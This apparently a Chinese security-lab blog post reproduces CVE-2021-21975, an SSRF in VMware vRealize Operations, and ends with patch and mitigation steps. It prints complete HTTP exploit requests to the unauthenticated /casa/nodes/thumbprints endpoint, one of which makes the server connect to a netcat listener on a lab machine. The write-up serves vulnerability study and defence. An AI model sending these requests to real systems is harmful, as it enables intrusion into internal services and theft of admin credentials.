影响范围
- VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、7.5.0
- VMware Cloud Foundation 4.x、3.x
- vRealize Suite Lifecycle Manager 8.x
漏洞类型
服务端请求伪造
利用条件
影响范围内应用
漏洞概述
2021年3月31日,VMWare官方发布了VMSA-2021-0004的风险通告,漏洞编号为CVE-2021-21975,CVE-2021-21983,漏洞等级:高危,漏洞评分8.6。
CVE-2021-21975:通过网络访问vRealize Operations Manager API的恶意攻击者可以执行服务器端请求伪造攻击,以窃取管理凭据。
CVE-2021-21983:通过网络访问vRealize Operations Manager API的经过身份验证的恶意行为者可以将文件写入操作系统上的任意位置
漏洞复现
环境搭建
首先将OVA文件导入虚拟机中:
导入后需要重置一次密码(12345Qwert!@#$%)
之后再浏览器中访问以上URL:
之后设置密码(123Qwe!@#)
至此环境搭建完成~
漏洞利用
退出当前登录认证:
之后访问 /casa/nodes/thumbprints并使用burpsuite抓取数据包,构造以下请求数据包使服务端请求登录认证页面:
代码语言:javascript复制POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.203.155
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 36
["127.0.0.1:443/admin/login.action"]
使用DNSLog验证SSRF时发现好长一段时间都没有任何回显,后无奈使用nc进行验证,构造请求数据包如下:
代码语言:javascript复制POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.203.155
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 23
["192.168.202.86:4444"]
安全建议
1、官方已提供固件补丁包,可以访问以下连接下载
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
2、如果无法打补丁,可以根据以下步骤进行缓解
a、通过SSH或控制台以root用户身份登录到主节点,然后在控制台中按ALT F1进行登录
b、在文本编辑器中打开/usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml,之后查找并删除以下内容:
代码语言:javascript复制<sec:http pattern ="/ nodes / thumbprints" security ='none'/>c、保存并关闭文件
d、重新启动CaSA服务:
e、重新启动vmware-casa服务
代码语言:javascript复制service vmware-casa restartf、在vRealize Operations群集中的所有其他节点上重复以上步骤
参考链接
https://kb.vmware.com/s/article/83210
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21975.yaml
欢迎关注微信公众号"七芒星实验室"获取更多精彩内容~
